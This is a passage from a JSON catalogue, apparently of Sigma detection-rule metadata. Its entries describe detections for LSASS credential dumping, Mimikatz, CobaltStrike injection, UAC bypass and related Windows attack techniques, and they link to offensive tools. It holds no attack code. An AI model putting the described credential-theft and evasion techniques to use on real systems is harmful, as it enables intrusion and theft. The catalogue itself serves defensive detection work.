"https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1059.001/T1059.001.md#atomic-test-8---powershell-xml-requests", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_xml_iex.yml" - ], - "tags": [ - "attack.execution", - "attack.t1059.001" - ], - "creation_date": "2022/01/19", - "filename": "posh_ps_xml_iex.yml", - "author": "frack113", - "level": "medium", - "falsepositive": [ - "Legitimate administrative script" - ], - "logsource.category": "ps_script", - "logsource.product": "windows" - } - }, - { - "description": "Detects shellcode injection by Metasploit's migrate and Empire's psinject", - "uuid": "250ae82f-736e-4844-a68b-0b5e8cc887da", - "value": "Shellcode Injection", - "meta": { - "refs": [ - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_access/process_access_win_shellcode_inject_msf_empire.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1055" - ], - "creation_date": "2022/03/11", - "filename": "process_access_win_shellcode_inject_msf_empire.yml", - "author": "Bhabesh Raj", - "level": "high", - "falsepositive": [ - "Empire's csharp_exe payload uses 0x1f3fff for process enumeration as well" - ], - "logsource.category": "process_access", - "logsource.product": "windows" - } - }, - { - "description": "Detects suspicious access to Lsass handle via a call trace to \"seclogon.dll\"", - "uuid": "472159c5-31b9-4f56-b794-b766faa8b0a7", - "value": "Suspicious LSASS Access Via MalSecLogon", - "meta": { - "refs": [ - "https://twitter.com/SBousseaden/status/1541920424635912196", - "https://github.com/elastic/detection-rules/blob/2bc1795f3d7bcc3946452eb4f07ae799a756d94e/rules/windows/credential_access_lsass_handle_via_malseclogon.toml", - "https://splintercod3.blogspot.com/p/the-hidden-side-of-seclogon-part-3.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_access/process_access_win_susp_seclogon.yml" - ], - "tags": [ - "attack.credential_access", - "attack.t1003.001" - ], - "creation_date": "2022/06/29", - "filename": "process_access_win_susp_seclogon.yml", - "author": "Samir Bousseaden (original elastic rule), Nasreddine Bencherchali (sigma)", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_access", - "logsource.product": "windows" - } - }, - { - "description": "Detects various indicators of Microsoft Connection Manager Profile Installer execution", - "uuid": "3b4b232a-af90-427c-a22f-30b0c0837b95", - "value": "CMSTP Execution Process Access", - "meta": { - "refs": [ - "https://web.archive.org/web/20190720093911/http://www.endurant.io/cmstp/detecting-cmstp-enabled-code-execution-and-uac-bypass-with-sysmon/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_access/proc_access_win_cmstp_execution_by_access.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1218.003", - "attack.execution", - "attack.t1559.001", - "attack.g0069", - "attack.g0080", - "car.2019-04-001" - ], - "creation_date": "2018/07/16", - "filename": "proc_access_win_cmstp_execution_by_access.yml", - "author": "Nik Seetharaman", - "level": "high", - "falsepositive": [ - "Legitimate CMSTP use (unlikely in modern enterprise environments)" - ], - "logsource.category": "process_access", - "logsource.product": "windows" - } - }, - { - "description": "Detects a typical pattern of a CobaltStrike BOF which inject into other processes", - "uuid": "09706624-b7f6-455d-9d02-adee024cee1d", - "value": "CobaltStrike BOF Injection Pattern", - "meta": { - "refs": [ - "https://github.com/boku7/injectAmsiBypass", - "https://github.com/boku7/spawn", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_access/proc_access_win_cobaltstrike_bof_injection_pattern.yml" - ], - "tags": [ - "attack.execution", - "attack.t1106", - "attack.defense_evasion", - "attack.t1562.001" - ], - "creation_date": "2021/08/04", - "filename": "proc_access_win_cobaltstrike_bof_injection_pattern.yml", - "author": "Christian Burkard", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_access", - "logsource.product": "windows" - } - }, - { - "description": "Detects processes requesting access to LSASS memory via suspicious access masks. This is typical for credentials dumping tools", - "uuid": "32d0d3e2-e58d-4d41-926b-18b520b2b32d", - "value": "Credential Dumping Tools Accessing LSASS Memory", - "meta": { - "refs": [ - "https://onedrive.live.com/view.aspx?resid=D026B4699190F1E6!2843&ithint=file%2cpptx&app=PowerPoint&authkey=!AMvCRTKB_V1J5ow", - "https://cyberwardog.blogspot.com/2017/03/chronicles-of-threat-hunter-hunting-for_22.html", - "https://www.slideshare.net/heirhabarov/hunting-for-credentials-dumping-in-windows-environment", - "http://security-research.dyndns.org/pub/slides/FIRST2017/FIRST-2017_Tom-Ueltschi_Sysmon_FINAL_notes.pdf", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_access/proc_access_win_cred_dump_lsass_access.yml" - ], - "tags": [ - "attack.credential_access", - "attack.t1003.001", - "attack.s0002", - "car.2019-04-004" - ], - "creation_date": "2017/02/16", - "filename": "proc_access_win_cred_dump_lsass_access.yml", - "author": "Florian Roth, Roberto Rodriguez, Dimitrios Slamaris, Mark Russinovich, Thomas Patzke, Teymur Kheirkhabarov, Sherif Eldeeb, James Dickenson, Aleksey Potapov, oscd.community (update)", - "level": "high", - "falsepositive": [ - "Legitimate software accessing LSASS process for legitimate reason; please add more filters" - ], - "logsource.category": "process_access", - "logsource.product": "windows" - } - }, - { - "description": "Detects the usage of the direct syscall of NtOpenProcess which might be done from a CobaltStrike BOF.", - "uuid": "3f3f3506-1895-401b-9cc3-e86b16e630d0", - "value": "Direct Syscall of NtOpenProcess", - "meta": { - "refs": [ - "https://medium.com/falconforce/falconfriday-direct-system-calls-and-cobalt-strike-bofs-0xff14-741fa8e1bdd6", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_access/proc_access_win_direct_syscall_ntopenprocess.yml" - ], - "tags": [ - "attack.execution", - "attack.t1106" - ], - "creation_date": "2021/07/28", - "filename": "proc_access_win_direct_syscall_ntopenprocess.yml", - "author": "Christian Burkard, Tim Shelton", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_access", - "logsource.product": "windows" - } - }, - { - "description": "Detects the use of SysmonEnte, a tool to attack the integrity of Sysmon", - "uuid": "d29ada0f-af45-4f27-8f32-f7b77c3dbc4e", - "value": "SysmonEnte Usage", - "meta": { - "refs": [ - "https://codewhitesec.blogspot.com/2022/09/attacks-on-sysmon-revisited-sysmonente.html", - "https://github.com/codewhitesec/SysmonEnte/", - "https://github.com/codewhitesec/SysmonEnte/blob/main/screens/1.png", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_access/proc_access_win_hack_sysmonente.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1562.002" - ], - "creation_date": "2022/09/07", - "filename": "proc_access_win_hack_sysmonente.yml", - "author": "Florian Roth", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_access", - "logsource.product": "windows" - } - }, - { - "description": "Detects HandleKatz opening LSASS to duplicate its handle to later dump the memory without opening any new handles", - "uuid": "b1bd3a59-c1fd-4860-9f40-4dd161a7d1f5", - "value": "HandleKatz Duplicating LSASS Handle", - "meta": { - "refs": [ - "https://github.com/codewhitesec/HandleKatz", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_access/proc_access_win_handlekatz_lsass_access.yml" - ], - "tags": [ - "attack.execution", - "attack.t1106", - "attack.defense_evasion", - "attack.t1003.001" - ], - "creation_date": "2022/06/27", - "filename": "proc_access_win_handlekatz_lsass_access.yml", - "author": "Bhabesh Raj (rule), @thefLinkk", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_access", - "logsource.product": "windows" - } - }, - { - "description": "Detects suspect access to svchost process memory such as that used by Invoke-Phantom to kill the winRM windows event logging service.", - "uuid": "166e9c50-8cd9-44af-815d-d1f0c0e90dde", - "value": "Suspect Svchost Memory Asccess", - "meta": { - "refs": [ - "https://github.com/hlldz/Invoke-Phant0m", - "https://twitter.com/timbmsft/status/900724491076214784", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_access/proc_access_win_invoke_phantom.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1562.002" - ], - "creation_date": "2020/01/02", - "filename": "proc_access_win_invoke_phantom.yml", - "author": "Tim Burrell", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_access", - "logsource.product": "windows" - } - }, - { - "description": "Detects LSASS process access by LaZagne for credential dumping.", - "uuid": "4b9a8556-99c4-470b-a40c-9c8d02c77ed0", - "value": "Credential Dumping by LaZagne", - "meta": { - "refs": [ - "https://twitter.com/bh4b3sh/status/1303674603819081728", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_access/proc_access_win_lazagne_cred_dump_lsass_access.yml" - ], - "tags": [ - "attack.credential_access", - "attack.t1003.001", - "attack.s0349" - ], - "creation_date": "2020/09/09", - "filename": "proc_access_win_lazagne_cred_dump_lsass_access.yml", - "author": "Bhabesh Raj, Jonhnathan Ribeiro", - "level": "critical", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_access", - "logsource.product": "windows" - } - }, - { - "description": "Detects the process injection of a LittleCorporal generated Maldoc.", - "uuid": "7bdde3bf-2a42-4c39-aa31-a92b3e17afac", - "value": "LittleCorporal Generated Maldoc Injection", - "meta": { - "refs": [ - "https://github.com/connormcgarr/LittleCorporal", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_access/proc_access_win_littlecorporal_generated_maldoc.yml" - ], - "tags": [ - "attack.execution", - "attack.t1204.002", - "attack.t1055.003" - ], - "creation_date": "2021/08/09", - "filename": "proc_access_win_littlecorporal_generated_maldoc.yml", - "author": "Christian Burkard", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_access", - "logsource.product": "windows" - } - }, - { - "description": "COM interface (EditionUpgradeManager) that is not used by standard executables.", - "uuid": "fb3722e4-1a06-46b6-b772-253e2e7db933", - "value": "Load Undocumented Autoelevated COM Interface", - "meta": { - "refs": [ - "https://www.snip2code.com/Snippet/4397378/UAC-bypass-using-EditionUpgradeManager-C/", - "https://gist.github.com/hfiref0x/de9c83966623236f5ebf8d9ae2407611", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_access/proc_access_win_load_undocumented_autoelevated_com_interface.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1548.002" - ], - "creation_date": "2020/10/07", - "filename": "proc_access_win_load_undocumented_autoelevated_com_interface.yml", - "author": "oscd.community, Dmitry Uchakin", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_access", - "logsource.product": "windows" - } - }, - { - "description": "Detects adversaries leveraging the MiniDump export function from comsvcs.dll via rundll32 to perform a memory dump from lsass.", - "uuid": "a49fa4d5-11db-418c-8473-1e014a8dd462", - "value": "Lsass Memory Dump via Comsvcs DLL", - "meta": { - "refs": [ - "https://twitter.com/shantanukhande/status/1229348874298388484", - "https://modexp.wordpress.com/2019/08/30/minidumpwritedump-via-com-services-dll/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_access/proc_access_win_lsass_dump_comsvcs_dll.yml" - ], - "tags": [ - "attack.credential_access", - "attack.t1003.001" - ], - "creation_date": "2020/10/20", - "filename": "proc_access_win_lsass_dump_comsvcs_dll.yml", - "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", - "level": "critical", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_access", - "logsource.product": "windows" - } - }, - { - "description": "Detects process LSASS memory dump using Mimikatz, NanoDump, Invoke-Mimikatz, Procdump or Taskmgr based on the CallTrace pointing to ntdll.dll, dbghelp.dll or dbgcore.dll for win10, server2016 and up.", - "uuid": "5ef9853e-4d0e-4a70-846f-a9ca37d876da", - "value": "LSASS Memory Dump", - "meta": { - "refs": [ - "https://blog.menasec.net/2019/02/threat-hunting-21-procdump-or-taskmgr.html", - "https://cyberwardog.blogspot.com/2017/03/chronicles-of-threat-hunter-hunting-for_22.html", - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1003.001/T1003.001.md", - "https://research.splunk.com/endpoint/windows_possible_credential_dumping/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_access/proc_access_win_lsass_memdump.yml" - ], - "tags": [ - "attack.credential_access", - "attack.t1003.001", - "attack.s0002" - ], - "creation_date": "2019/04/03", - "filename": "proc_access_win_lsass_memdump.yml", - "author": "Samir Bousseaden, Michael Haag", - "level": "high", - "falsepositive": [ - "False positives are present when looking for 0x1410. Exclusions may be required." - ], - "logsource.category": "process_access", - "logsource.product": "windows" - } - }, - { - "description": "Detects a possible process memory dump that uses the white-listed filename like TrolleyExpress.exe as a way to dump the lsass process memory without Microsoft Defender interference", - "uuid": "4be8b654-0c01-4c9d-a10c-6b28467fc651", - "value": "LSASS Access from White-Listed Processes", - "meta": { - "refs": [ - "https://twitter.com/_xpn_/status/1491557187168178176", - "https://www.ired.team/offensive-security/credential-access-and-credential-dumping/dump-credentials-from-lsass-process-without-mimikatz", - "https://twitter.com/mrd0x/status/1460597833917251595", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_access/proc_access_win_lsass_memdump_evasion.yml" - ], - "tags": [ - "attack.credential_access", - "attack.t1003.001", - "attack.s0002" - ], - "creation_date": "2022/02/10", - "filename": "proc_access_win_lsass_memdump_evasion.yml", - "author": "Florian Roth", - "level": "high", - "falsepositive": [ - "Unlikely, since these tools shouldn't access lsass.exe at all" - ], - "logsource.category": "process_access", - "logsource.product": "windows" - } - }, - { - "description": "Detects a possible process memory dump based on a keyword in the file name of the accessing process", - "uuid": "9bd012ee-0dff-44d7-84a0-aa698cfd87a3", - "value": "LSASS Memory Access by Tool Named Dump", - "meta": { - "refs": [ - "https://twitter.com/_xpn_/status/1491557187168178176", - "https://www.ired.team/offensive-security/credential-access-and-credential-dumping/dump-credentials-from-lsass-process-without-mimikatz", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_access/proc_access_win_lsass_memdump_indicators.yml" - ], - "tags": [ - "attack.credential_access", - "attack.t1003.001", - "attack.s0002" - ], - "creation_date": "2022/02/10", - "filename": "proc_access_win_lsass_memdump_indicators.yml", - "author": "Florian Roth", - "level": "high", - "falsepositive": [ - "Rare programs that contain the word dump in their name and access lsass" - ], - "logsource.category": "process_access", - "logsource.product": "windows" - } - }, - { - "description": "Detects process LSASS memory dump using Mimikatz, NanoDump, Invoke-Mimikatz, Procdump or Taskmgr based on the CallTrace pointing to ntdll.dll, dbghelp.dll or dbgcore.dll for win10, server2016 and up.", - "uuid": "e5b33f7d-eb93-48b6-9851-09e1e610b6d7", - "value": "WerFault Accassing LSASS", - "meta": { - "refs": [ - "https://github.com/helpsystems/nanodump/commit/578116faea3d278d53d70ea932e2bbfe42569507", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_access/proc_access_win_lsass_werfault.yml" - ], - "tags": [ - "attack.credential_access", - "attack.t1003.001", - "attack.s0002" - ], - "creation_date": "2012/06/27", - "filename": "proc_access_win_lsass_werfault.yml", - "author": "Florian Roth", - "level": "high", - "falsepositive": [ - "Actual failures in lsass.exe that trigger a crash dump (unlikely)", - "Unknown cases in which WerFault accesses lsass.exe" - ], - "logsource.category": "process_access", - "logsource.product": "windows" - } - }, - { - "description": "Detects a process access to verclsid.exe that injects shellcode from a Microsoft Office application / VBA macro", - "uuid": "b7967e22-3d7e-409b-9ed5-cdae3f9243a1", - "value": "Malware Shellcode in Verclsid Target Process", - "meta": { - "refs": [ - "https://twitter.com/JohnLaTwC/status/837743453039534080", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_access/proc_access_win_malware_verclsid_shellcode.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1055" - ], - "creation_date": "2017/03/04", - "filename": "proc_access_win_malware_verclsid_shellcode.yml", - "author": "John Lambert (tech), Florian Roth (rule)", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_access", - "logsource.product": "windows" - } - }, - { - "description": "Detects usage of mimikatz through WinRM protocol by monitoring access to lsass process by wsmprovhost.exe.", - "uuid": "aa35a627-33fb-4d04-a165-d33b4afca3e8", - "value": "Mimikatz through Windows Remote Management", - "meta": { - "refs": [ - "https://pentestlab.blog/2018/05/15/lateral-movement-winrm/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_access/proc_access_win_mimikatz_trough_winrm.yml" - ], - "tags": [ - "attack.credential_access", - "attack.execution", - "attack.t1003.001", - "attack.t1059.001", - "attack.lateral_movement", - "attack.t1021.006", - "attack.s0002" - ], - "creation_date": "2019/05/20", - "filename": "proc_access_win_mimikatz_trough_winrm.yml", - "author": "Patryk Prauze - ING Tech", - "level": "high", - "falsepositive": [ - "Unlikely" - ], - "logsource.category": "process_access", - "logsource.product": "windows" - } - }, - { - "description": "Detects LSASS process access by pypykatz for credential dumping.", - "uuid": "7186e989-4ed7-4f4e-a656-4674b9e3e48b", - "value": "Credential Dumping by Pypykatz", - "meta": { - "refs": [ - "https://github.com/skelsec/pypykatz", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_access/proc_access_win_pypykatz_cred_dump_lsass_access.yml" - ], - "tags": [ - "attack.credential_access", - "attack.t1003.001" - ], - "creation_date": "2021/08/03", - "filename": "proc_access_win_pypykatz_cred_dump_lsass_access.yml", - "author": "Bhabesh Raj", - "level": "critical", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_access", - "logsource.product": "windows" - } - }, - { - "description": "Detects process access to LSASS memory with suspicious access flags 0x410 and 0x01410 (spin-off of similar rule)", - "uuid": "678dfc63-fefb-47a5-a04c-26bcf8cc9f65", - "value": "Rare GrantedAccess Flags on LSASS Access", - "meta": { - "refs": [ - "https://docs.microsoft.com/en-us/windows/win32/procthread/process-security-and-access-rights", - "https://onedrive.live.com/view.aspx?resid=D026B4699190F1E6!2843&ithint=file%2cpptx&app=PowerPoint&authkey=!AMvCRTKB_V1J5ow", - "https://cyberwardog.blogspot.com/2017/03/chronicles-of-threat-hunter-hunting-for_22.html", - "https://www.slideshare.net/heirhabarov/hunting-for-credentials-dumping-in-windows-environment", - "http://security-research.dyndns.org/pub/slides/FIRST2017/FIRST-2017_Tom-Ueltschi_Sysmon_FINAL_notes.pdf", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_access/proc_access_win_rare_proc_access_lsass.yml" - ], - "tags": [ - "attack.credential_access", - "attack.t1003.001", - "attack.s0002" - ], - "creation_date": "2022/03/13", - "filename": "proc_access_win_rare_proc_access_lsass.yml", - "author": "Florian Roth", - "level": "medium", - "falsepositive": [ - "Legitimate software accessing LSASS process for legitimate reason" - ], - "logsource.category": "process_access", - "logsource.product": "windows" - } - }, - { - "description": "Detects process access to LSASS memory with suspicious access flags", - "uuid": "a18dd26b-6450-46de-8c91-9659150cf088", - "value": "Suspicious GrantedAccess Flags on LSASS Access", - "meta": { - "refs": [ - "https://docs.microsoft.com/en-us/windows/win32/procthread/process-security-and-access-rights", - "https://onedrive.live.com/view.aspx?resid=D026B4699190F1E6!2843&ithint=file%2cpptx&app=PowerPoint&authkey=!AMvCRTKB_V1J5ow", - "https://cyberwardog.blogspot.com/2017/03/chronicles-of-threat-hunter-hunting-for_22.html", - "https://www.slideshare.net/heirhabarov/hunting-for-credentials-dumping-in-windows-environment", - "http://security-research.dyndns.org/pub/slides/FIRST2017/FIRST-2017_Tom-Ueltschi_Sysmon_FINAL_notes.pdf", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_access/proc_access_win_susp_proc_access_lsass.yml" - ], - "tags": [ - "attack.credential_access", - "attack.t1003.001", - "attack.s0002" - ], - "creation_date": "2021/11/22", - "filename": "proc_access_win_susp_proc_access_lsass.yml", - "author": "Florian Roth", - "level": "high", - "falsepositive": [ - "Legitimate software accessing LSASS process for legitimate reason" - ], - "logsource.category": "process_access", - "logsource.product": "windows" - } - }, - { - "description": "Detects process access to LSASS memory with suspicious access flags and from a suspicious folder", - "uuid": "fa34b441-961a-42fa-a100-ecc28c886725", - "value": "LSASS Access from Program in Suspicious Folder", - "meta": { - "refs": [ - "https://docs.microsoft.com/en-us/windows/win32/procthread/process-security-and-access-rights", - "https://onedrive.live.com/view.aspx?resid=D026B4699190F1E6!2843&ithint=file%2cpptx&app=PowerPoint&authkey=!AMvCRTKB_V1J5ow", - "https://cyberwardog.blogspot.com/2017/03/chronicles-of-threat-hunter-hunting-for_22.html", - "https://www.slideshare.net/heirhabarov/hunting-for-credentials-dumping-in-windows-environment", - "http://security-research.dyndns.org/pub/slides/FIRST2017/FIRST-2017_Tom-Ueltschi_Sysmon_FINAL_notes.pdf", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_access/proc_access_win_susp_proc_access_lsass_susp_source.yml" - ], - "tags": [ - "attack.credential_access", - "attack.t1003.001", - "attack.s0002" - ], - "creation_date": "2021/11/27", - "filename": "proc_access_win_susp_proc_access_lsass_susp_source.yml", - "author": "Florian Roth", - "level": "high", - "falsepositive": [ - "Legitimate software accessing LSASS process for legitimate reason" - ], - "logsource.category": "process_access", - "logsource.product": "windows" - } - }, - { - "description": "Detects when a process, such as mimikatz, accesses the memory of svchost to dump credentials", - "uuid": "174afcfa-6e40-4ae9-af64-496546389294", - "value": "SVCHOST Credential Dump", - "meta": { - "refs": [ - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_access/proc_access_win_svchost_cred_dump.yml" - ], - "tags": [ - "attack.t1548" - ], - "creation_date": "2021/04/30", - "filename": "proc_access_win_svchost_cred_dump.yml", - "author": "Florent Labouyrie", - "level": "high", - "falsepositive": [ - "Non identified legit exectubale" - ], - "logsource.category": "process_access", - "logsource.product": "windows" - } - }, - { - "description": "Detects the pattern of UAC Bypass using a WoW64 logger DLL hijack (UACMe 30)", - "uuid": "4f6c43e2-f989-4ea5-bcd8-843b49a0317c", - "value": "UAC Bypass Using WOW64 Logger DLL Hijack", - "meta": { - "refs": [ - "https://github.com/hfiref0x/UACME", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_access/proc_access_win_uac_bypass_wow64_logger.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1548.002" - ], - "creation_date": "2021/08/23", - "filename": "proc_access_win_uac_bypass_wow64_logger.yml", - "author": "Christian Burkard", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_access", - "logsource.product": "windows" - } - }, - { - "description": "7-Zip through 21.07 on Windows allows privilege escalation (CVE-2022-29072) and command execution when a file with the .7z extension is dragged to the Help>Contents area. This is caused by misconfiguration of 7z.dll and a heap overflow. The command runs in a child process under the 7zFM.exe process.", - "uuid": "9a4ccd1a-3526-4d99-b980-9f9c5d3a6ee3", - "value": "Suspicious 7zip Subprocess", - "meta": { - "refs": [ - "https://github.com/kagancapar/CVE-2022-29072", - "https://twitter.com/kagancapar/status/1515219358234161153", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_7zip_cve_2022_29072.yml" - ], - "tags": [ - "cve.2022.29072" - ], - "creation_date": "2022/04/17", - "filename": "proc_creation_win_7zip_cve_2022_29072.yml", - "author": "frack113", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detection of unusual child processes by different system processes", - "uuid": "d522eca2-2973-4391-a3e0-ef0374321dae", - "value": "Abused Debug Privilege by Arbitrary Parent Processes", - "meta": { - "refs": [ - "https://image.slidesharecdn.com/kheirkhabarovoffzonefinal-181117201458/95/hunting-for-privilege-escalation-in-windows-environment-74-638.jpg", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_abusing_debug_privilege.yml" - ], - "tags": [ - "attack.privilege_escalation", - "attack.t1548" - ], - "creation_date": "2020/10/28", - "filename": "proc_creation_win_abusing_debug_privilege.yml", - "author": "Semanur Guneysu @semanurtg, oscd.community", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Windows telemetry makes use of the binary CompatTelRunner.exe to run a variety of commands and perform the actual telemetry collections. This binary was created to be easily extensible, and to that end, it relies on the registry to instruct on which commands to run. The problem is, it will run any arbitrary command without restriction of location or type.", - "uuid": "f548a603-c9f2-4c89-b511-b089f7e94549", - "value": "Abusing Windows Telemetry For Persistence", - "meta": { - "refs": [ - "https://www.trustedsec.com/blog/abusing-windows-telemetry-for-persistence/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_abusing_windows_telemetry_for_persistence.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.persistence", - "attack.t1112", - "attack.t1053" - ], - "creation_date": "2020/09/29", - "filename": "proc_creation_win_abusing_windows_telemetry_for_persistence.yml", - "author": "Sreeman", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Accesschk is an access and privilege audit tool developed by SysInternal and often being used by attacker to verify privileges", - "uuid": "c625d754-6a3d-4f65-9c9a-536aea960d37", - "value": "Accesschk Usage To Check Privileges", - "meta": { - "refs": [ - "https://speakerdeck.com/heirhabarov/hunting-for-privilege-escalation-in-windows-environment?slide=43", - "https://www.youtube.com/watch?v=JGs-aKf2OtU&ab_channel=OFFZONEMOSCOW", - "https://github.com/carlospolop/PEASS-ng/blob/fa0f2e17fbc1d86f1fd66338a40e665e7182501d/winPEAS/winPEASbat/winPEAS.bat", - "https://github.com/gladiatx0r/Powerless/blob/04f553bbc0c65baf4e57344deff84e3f016e6b51/Powerless.bat", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_accesschk_usage_after_priv_escalation.yml" - ], - "tags": [ - "attack.discovery", - "attack.t1069.001" - ], - "creation_date": "2020/10/13", - "filename": "proc_creation_win_accesschk_usage_after_priv_escalation.yml", - "author": "Teymur Kheirkhabarov (idea), Mangatas Tondang (rule), oscd.community, Nasreddine Bencherchali (modified)", - "level": "medium", - "falsepositive": [ - "System administrator Usage" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects the use of Advanced IP Scanner. Seems to be a popular tool for ransomware groups.", - "uuid": "bef37fa2-f205-4a7b-b484-0759bfd5f86f", - "value": "Advanced IP Scanner", - "meta": { - "refs": [ - "https://news.sophos.com/en-us/2019/12/09/snatch-ransomware-reboots-pcs-into-safe-mode-to-bypass-protection/", - "https://www.fireeye.com/blog/threat-research/2020/05/tactics-techniques-procedures-associated-with-maze-ransomware-incidents.html", - "https://labs.f-secure.com/blog/prelude-to-ransomware-systembc", - "https://assets.documentcloud.org/documents/20444693/fbi-pin-egregor-ransomware-bc-01062021.pdf", - "https://thedfirreport.com/2021/01/18/all-that-for-a-coinminer", - "https://github.com/3CORESec/MAL-CL/tree/master/Descriptors/Other/Advanced%20IP%20Scanner", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_advanced_ip_scanner.yml" - ], - "tags": [ - "attack.discovery", - "attack.t1046", - "attack.t1135" - ], - "creation_date": "2020/05/12", - "filename": "proc_creation_win_advanced_ip_scanner.yml", - "author": "@ROxPinTeddy, Nasreddine Bencherchali", - "level": "medium", - "falsepositive": [ - "Legitimate administrative use" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects the use of Advanced Port Scanner.", - "uuid": "54773c5f-f1cc-4703-9126-2f797d96a69d", - "value": "Advanced Port Scanner", - "meta": { - "refs": [ - "https://github.com/3CORESec/MAL-CL/tree/master/Descriptors/Other/Advanced%20Port%20Scanner", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_advanced_port_scanner.yml" - ], - "tags": [ - "attack.discovery", - "attack.t1046", - "attack.t1135" - ], - "creation_date": "2021/12/18", - "filename": "proc_creation_win_advanced_port_scanner.yml", - "author": "Nasreddine Bencherchali", - "level": "medium", - "falsepositive": [ - "Legitimate administrative use", - "Tools with similar commandline (very rare)" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects execution from an Alternate Data Stream (ADS). Adversaries may use NTFS file attributes to hide their malicious data in order to evade detection", - "uuid": "7f43c430-5001-4f8b-aaa9-c3b88f18fa5c", - "value": "Execute From Alternate Data Streams", - "meta": { - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1564.004/T1564.004.md", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_alternate_data_streams.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1564.004" - ], - "creation_date": "2021/09/01", - "filename": "proc_creation_win_alternate_data_streams.yml", - "author": "frack113", - "level": "medium", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects Windows Installer service (msiexec.exe) spawning \"cmd\" or \"powershell\"", - "uuid": "1e53dd56-8d83-4eb4-a43e-b790a05510aa", - "value": "Always Install Elevated MSI Spawned Cmd And Powershell", - "meta": { - "refs": [ - "https://image.slidesharecdn.com/kheirkhabarovoffzonefinal-181117201458/95/hunting-for-privilege-escalation-in-windows-environment-50-638.jpg", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_always_install_elevated_msi_spawned_cmd_powershell.yml" - ], - "tags": [ - "attack.privilege_escalation", - "attack.t1548.002" - ], - "creation_date": "2020/10/13", - "filename": "proc_creation_win_always_install_elevated_msi_spawned_cmd_powershell.yml", - "author": "Teymur Kheirkhabarov (idea), Mangatas Tondang (rule), 